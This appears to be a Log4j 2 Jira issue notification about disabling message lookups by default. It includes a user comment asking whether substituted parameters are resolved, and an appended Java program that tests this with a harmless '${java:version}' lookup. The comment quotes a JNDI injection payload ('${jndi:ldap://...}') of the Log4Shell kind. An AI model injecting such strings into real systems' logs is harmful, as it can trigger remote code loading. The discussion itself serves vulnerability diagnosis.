[ https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298 ]
Eric Everman commented on LOG4J2-3198:
--------------------------------------

Is there any possible configuration where the text of substituted parameters is substituted? For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", request.getParameter());
{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}
{code}
??

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs
> and implementation. Given a particular API, there's an expectation that a
> particular shape of call will result in specific results. However, lookups in
> messages can be passed into JUL and will result in resolved output in log4j
> formatted output, but not any other implementations despite no direct
> dependency on those implementations.
> There's also a cost to searching formatted message strings for particular
> escape sequences which define lookups. This feature is not used as far as
> we've been able to tell searching GitHub and Stack Overflow, so it's
> unnecessary for every log event in every application to burn several CPU
> cycles searching for the value.

--
This message was sent by Atlassian Jira
(v8.20.1#820001)
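
A way to check a given Log4j 2 version for the behaviour asked about above, as an added example that is not part of the original comment or the Log4j project's code: it logs the comment's message with a parameter whose value is the benign `${java:version}` lookup, once through `%m` and once through `%m{nolookups}`. The class name, appender names and sample parameter value are assumptions; it needs log4j-api and log4j-core on the classpath.

```java
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.config.Configurator;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilder;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.core.config.builder.impl.BuiltConfiguration;

// Hypothetical class name; added example, not Log4j project code.
public class MessageLookupCheck {

    public static void main(String[] args) {
        ConfigurationBuilder<BuiltConfiguration> b =
                ConfigurationBuilderFactory.newConfigurationBuilder();

        // Appender 1: plain %m, i.e. whatever the installed version does by default.
        b.add(b.newAppender("plain", "Console")
                .add(b.newLayout("PatternLayout")
                        .addAttribute("pattern", "%%m            | %m%n")));

        // Appender 2: %m{nolookups}, which tells the layout not to resolve
        // lookup sequences found in the formatted message.
        b.add(b.newAppender("nolookups", "Console")
                .add(b.newLayout("PatternLayout")
                        .addAttribute("pattern", "%%m{nolookups} | %m{nolookups}%n")));

        b.add(b.newRootLogger(Level.DEBUG)
                .add(b.newAppenderRef("plain"))
                .add(b.newAppenderRef("nolookups")));

        // Install the programmatic configuration before the first logger is created.
        Configurator.initialize(b.build());
        Logger logger = LogManager.getLogger(MessageLookupCheck.class);

        // Constructed stand-in for request.getParameter(): a harmless lookup
        // that only reads the JVM version. The format string itself has no lookup.
        String userInput = "${java:version}";

        // Same call shape as in the comment: the lookup text arrives only
        // through the '{}' parameter, never through the message template.
        logger.debug("User entered '{}', which is invalid", userInput);
    }
}
```

If the `%m` line shows the parameter resolved instead of the literal `${java:version}` text, message lookups are being applied to substituted parameter values in that version and configuration.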